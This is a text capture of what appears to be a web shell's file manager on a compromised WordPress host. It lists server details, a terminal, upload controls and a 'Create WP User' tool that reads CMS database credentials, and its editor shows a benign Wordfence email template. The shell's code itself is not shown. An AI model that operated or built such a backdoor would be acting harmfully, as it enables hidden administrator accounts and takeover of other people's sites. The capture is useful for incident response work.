Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
wordfence
/
modules
/
login-security
/
views
/
email
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
login-verification.php
1.32 KB
-rw-r--r--
2026-02-24 12:20
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
login-verification.php
<?php if (!defined('WORDFENCE_LS_VERSION')) { exit; } /** * @var string $ip The requesting IP. Required. * @var string $siteName The site name. Required. * @var string $verificationURL The verification URL. Required. * @var bool $canEnable2FA Whether or not the user this is being sent to can enable 2FA. Optional */ ?> <strong><?php echo wp_kses(sprintf(__('Please verify a login attempt for your account on: %s', 'wordfence'), $siteName), array('strong'=>array())); ?></strong> <br><br> <?php echo '<strong>' . esc_html__('Request Time:', 'wordfence') . '</strong> ' . esc_html(\WordfenceLS\Controller_Time::format_local_time('F j, Y h:i:s A')); ?><br> <?php echo '<strong>' . esc_html__('IP:', 'wordfence') . '</strong> ' . esc_html($ip); ?> <br><br> <?php echo wp_kses(__('The request was flagged as suspicious, and we need verification that you attempted to log in to allow it to proceed. This verification link <b>will be valid for 15 minutes</b> from the time it was sent. If you did not attempt this login, please change your password immediately.', 'wordfence'), array('b'=>array())); ?> <br><br> <?php echo wp_kses(sprintf(__('If you were attempting to log in to this site, <a href="%s"><strong>Verify and Log In</strong></a>', 'wordfence'), esc_url($verificationURL)), array('a' => array('href' => array()), 'strong' => array())); ?>
关闭
保存